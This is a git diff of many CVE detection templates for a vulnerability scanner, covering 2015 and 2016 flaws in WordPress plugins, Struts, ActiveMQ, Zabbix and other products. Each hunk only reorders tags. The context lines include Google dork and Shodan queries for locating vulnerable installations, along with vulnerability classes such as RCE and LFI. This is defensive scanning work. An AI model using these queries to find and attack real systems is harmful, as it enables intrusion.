100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: novius-os product: novius_os - tags: packetstorm,cve,cve2015,redirect,novius,novius-os + tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 57a0d918a8..41779d8e2f 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -29,7 +29,7 @@ info: product: stageshow framework: wordpress google-query: inurl:"/wp-content/plugins/stageshow/" - tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin,stageshow_project + tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 2529d4786f..aa82471593 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -27,7 +27,7 @@ info: vendor: mdc_youtube_downloader_project product: mdc_youtube_downloader framework: wordpress - tags: cve,cve2015,wp,lfi,mdc_youtube_downloader_project,wordpress + tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress http: - method: GET diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 42cabb8cc6..05a38139f6 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -28,7 +28,7 @@ info: product: swim_team framework: wordpress google-query: inurl:"/wp-content/plugins/wp-swimteam" - tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project + tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 1814bc9326..86c1864497 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: elasticsearch product: elasticsearch - tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive + tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive http: - raw: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 0c94435848..ba50948fc3 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -28,7 +28,7 @@ info: vendor: geddyjs product: geddy framework: node.js - tags: cve,cve2015,geddy,lfi,geddyjs,node.js + tags: cve2015,cve,geddy,lfi,geddyjs,node.js http: - method: GET diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 64952bb66a..002033be65 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nordex product: nordex_control_2_scada - tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015 + tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2 http: - method: POST diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 7bf5e10d20..930b5bf2b0 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: combodo product: itop - tags: cve,cve2015,xss,itop,combodo + tags: cve2015,cve,xss,itop,combodo http: - method: GET diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 6a54a96234..9a851d16b4 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -24,7 +24,7 @@ info: vendor: sourceafrica_project product: sourceafrica framework: wordpress - tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress,sourceafrica_project + tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 146702ec93..af5b295bcb 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: d-link product: dvg-n5402sp_firmware - tags: cve,cve2015,dlink,lfi,packetstorm,edb,d-link + tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link http: - raw: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 0344b55a05..f218b05e21 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joomla product: joomla\! - tags: packetstorm,cve,cve2015,joomla,sqli + tags: cve2015,cve,packetstorm,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 771ee13d37..83aa9a74c8 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -28,7 +28,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve,genetechsolutions + tags: cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions http: - method: GET diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 1cb19dce20..aeb17bb4ef 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -28,7 +28,7 @@ info: vendor: ibm product: tivoli_common_reporting shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev + tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev http: - raw: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index da2916da95..c46764fea8 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zohocorp product: manageengine_firewall_analyzer - tags: manageengine,edb,cve,cve2015,lfi,zohocorp + tags: cve2015,cve,manageengine,edb,lfi,zohocorp http: - method: GET diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 35513fc5fe..6388ee5a6e 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: kentico product: kentico_cms - tags: cve,cve2015,kentico,redirect,packetstorm + tags: cve2015,cve,kentico,redirect,packetstorm http: - method: GET diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 0a55d8cd36..232e3f8711 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gameconnect product: sourcebans - tags: cve,cve2015,xss,sourcebans,gameconnect + tags: cve2015,cve,xss,sourcebans,gameconnect http: - method: GET diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 66975ca9e6..b76f7641e0 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -26,7 +26,7 @@ info: vendor: atlassian product: confluence shodan-query: http.component:"Atlassian Confluence" - tags: edb,cve,cve2015,atlassian,confluence + tags: cve2015,cve,edb,atlassian,confluence http: - method: GET diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index f31ce86d95..1972358579 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: umbraco product: umbraco - tags: cve,cve2015,ssrf,oast,umbraco + tags: cve2015,cve,ssrf,oast,umbraco http: - method: GET diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 87d5493831..37f3578604 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -28,7 +28,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin,newstatpress_project + tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project http: - raw: diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index a9938e4a4b..1654c64569 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -27,7 +27,7 @@ info: vendor: duckdev product: 404_to_301 framework: wordpress - tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev + tags: cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev http: - raw: diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index c4151cffce..0c2ea2cfe9 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -28,7 +28,7 @@ info: product: wp-symposium framework: wordpress google-query: inurl:"/wp-content/plugins/wp-symposium" - tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin,wpsymposiumpro + tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro http: - method: GET diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index c0797ed689..0a2b893375 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -26,7 +26,7 @@ info: product: robotcpa framework: wordpress google-query: inurl:"/wp-content/plugins/robotcpa" - tags: wp-plugin,lfi,edb,cve,cve2015,wordpress,robot-cpa + tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa http: - method: GET diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index ef1928e067..081c916e0d 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -25,7 +25,7 @@ info: vendor: adobe product: dispatcher shodan-query: http.component:"Adobe Experience Manager" - tags: cve,cve2016,adobe,aem + tags: cve2016,cve,adobe,aem http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 68d9de176d..93e9bfc080 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -27,7 +27,7 @@ info: product: admin-font-editor framework: wordpress google-query: inurl:"/wp-content/plugins/admin-font-editor" - tags: cve,cve2016,wordpress,xss,wp-plugin,admin-font-editor_project + tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 893efd080d..ef37ca3157 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -26,7 +26,7 @@ info: vendor: ajax-random-post_project product: ajax-random-post framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,ajax-random-post_project + tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 825d316bdf..628b9a3118 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -25,7 +25,7 @@ info: product: anti-plagiarism framework: wordpress google-query: inurl:"/wp-content/plugins/anti-plagiarism" - tags: cve,cve2016,wordpress,xss,wp-plugin,anti-plagiarism_project + tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 30271e72e5..fddf5a1f4c 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -27,7 +27,7 @@ info: product: defa-online-image-protector framework: wordpress google-query: inurl:"/wp-content/plugins/defa-online-image-protector" - tags: cve,cve2016,wordpress,xss,wp-plugin,defa-online-image-protector_project + tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 698bd404f1..5269ed66e9 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -27,7 +27,7 @@ info: product: e-search framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" - tags: cve,cve2016,wordpress,xss,wp-plugin,e-search_project + tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b49765daf5..a79fd50f15 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -27,7 +27,7 @@ info: product: esearch framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" - tags: cve,cve2016,wordpress,xss,wp-plugin,e-search_project + tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index d3580c2873..73b9d29799 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -27,7 +27,7 @@ info: product: tooltip_glossary framework: wordpress google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" - tags: cve,cve2016,wordpress,xss,wp-plugin,cminds + tags: cve2016,cve,wordpress,xss,wp-plugin,cminds http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index f68ea329e6..1a7108be8e 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -27,7 +27,7 @@ info: product: forget_about_shortcode_buttons framework: wordpress google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" - tags: cve,cve2016,wordpress,xss,wp-plugin,designsandcode + tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 3eebe36650..1b7d286492 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -27,7 +27,7 @@ info: product: hdw-tube framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" - tags: cve,cve2016,wordpress,xss,wp-plugin,hdw-tube_project + tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index f227aee8d0..52acd85c1a 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -27,7 +27,7 @@ info: product: hdw-tube framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" - tags: cve,cve2016,wordpress,xss,wp-plugin,hdw-tube_project + tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 75dd091159..c269c12e9c 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -25,7 +25,7 @@ info: product: heat-trackr framework: wordpress google-query: inurl:"/wp-content/plugins/heat-trackr" - tags: cve,cve2016,wordpress,xss,wp-plugin,heat-trackr_project + tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index dcf54480c2..7e9d557e54 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -26,7 +26,7 @@ info: vendor: hero-maps-pro_project product: hero-maps-pro framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,maps,hero-maps-pro_project + tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 74960b68de..8cdd1f52ed 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -28,7 +28,7 @@ info: product: infusionsoft framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft" - tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan,infusionsoft_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 3cf05a91dd..2a62fc3e3c 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -26,7 +26,7 @@ info: vendor: new-year-firework_project product: new-year-firework framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,new-year-firework_project + tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index df7400be6b..e8cb394c27 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -27,7 +27,7 @@ info: vendor: parsi-font_project product: parsi-font framework: wordpress - tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve,parsi-font_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 5bbb52edee..931dd18ce2 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -26,7 +26,7 @@ info: vendor: photoxhibit_project product: photoxhibit framework: wordpress - tags: cve,cve2016,wordpress,wp-plugin,xss,photoxhibit_project + tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index c69080d170..6d6e67f293 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -26,7 +26,7 @@ info: vendor: pondol-formmail_project product: pondol-formmail framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,mail,pondol-formmail_project + tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 82b856ada7..643453e50c 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -27,7 +27,7 @@ info: vendor: s3-video_project product: s3-video framework: wordpress - tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan,s3-video_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 7c442a5430..4f921288a6 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -26,7 +26,7 @@ info: vendor: simpel-reserveren_project product: simpel-reserveren framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,simpel-reserveren_project + tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index ac10c66468..fd60517a71 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -26,7 +26,7 @@ info: vendor: tidio-form_project product: tidio-form framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,tidio-form_project + tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index a812814656..2f0e276775 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -26,7 +26,7 @@ info: vendor: tidio-gallery_project product: tidio-gallery framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,tidio-gallery_project + tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 5292f839a3..1c2c114b7f 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -26,7 +26,7 @@ info: vendor: browserweb product: whizz framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,browserweb + tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index c3e0fb62b3..18f4faf3fb 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -24,7 +24,7 @@ info: vendor: wpsolr product: wpsolr-search-engine framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,wpsolr + tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr http: - method: GET diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 251d9e949a..49626e4c99 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpmailer_project product: phpmailer - tags: seclists,cve,cve2016,rce,edb,wordpress,phpmailer_project + tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project http: - raw: diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index cdc749070f..6b9f4d15a3 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -28,7 +28,7 @@ info: vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 - tags: packetstorm,cve,cve2016,rce,oast,wdcloud,western_digital + tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: - raw: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index f336d8c25b..6fcc9b0e45 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zabbix product: zabbix - tags: cve,cve2016,zabbix,sqli,vulhub + tags: cve2016,cve,zabbix,sqli,vulhub http: - method: GET diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index a247e7ddf1..019e840665 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -27,7 +27,7 @@ info: vendor: opsview product: opsview shodan-query: title:"Opsview" - tags: cve,cve2016,opsview,lfi + tags: cve2016,cve,opsview,lfi http: - method: GET diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index ff01790df3..193390b59e 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: opsview product: opsview - tags: cve,cve2016,redirect,opsview,authenticated + tags: cve2016,cve,redirect,opsview,authenticated http: - raw: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 4e62d3a64d..9fc568d9bb 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -29,7 +29,7 @@ info: product: zedna_ebook_download framework: wordpress google-query: inurl:"/wp-content/plugins/ebook-download" - tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project + tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 3c203a30c5..9d7af3a012 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -28,7 +28,7 @@ info: vendor: zm-gallery_project product: zm-gallery framework: wordpress - tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project + tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project http: - raw: diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 10e466d89e..9d940e85cf 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -28,7 +28,7 @@ info: product: wsecure framework: wordpress google-query: inurl:"/wp-content/plugins/wsecure" - tags: cve,cve2016,wordpress,wp-plugin,rce,joomlaserviceprovider + tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index c01f06744c..4c4eeabc6b 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -27,7 +27,7 @@ info: vendor: brafton product: brafton framework: wordpress - tags: wpscan,cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated + tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated http: - raw: diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 7989e9ea0d..3f9231465b 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -26,7 +26,7 @@ info: vendor: scoreme_project product: scoreme framework: wordpress - tags: cve,cve2016,wordpress,wp-theme,xss,scoreme_project + tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project http: - method: GET diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index b8989212d7..44cf215e0a 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: wnap320_firmware - tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016 + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev http: - raw: diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index d4a93e0e45..3281ad6321 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -28,7 +28,7 @@ info: vendor: sap product: netweaver shodan-query: http.favicon.hash:-266008933 - tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016 + tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb http: - method: GET diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index e2f2668964..af93490370 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: struts - tags: cve,cve2016,struts,rce,apache + tags: cve2016,cve,struts,rce,apache http: - raw: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 57bd1ccfb3..986c4e9616 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: apache product: activemq - tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive + tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 8b1d247367..084f2b5949 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: fortinet product: fortios - tags: cve2016,redirect,fortinet,fortios,seclists,cve + tags: cve2016,cve,redirect,fortinet,fortios,seclists http: - method: GET diff --git 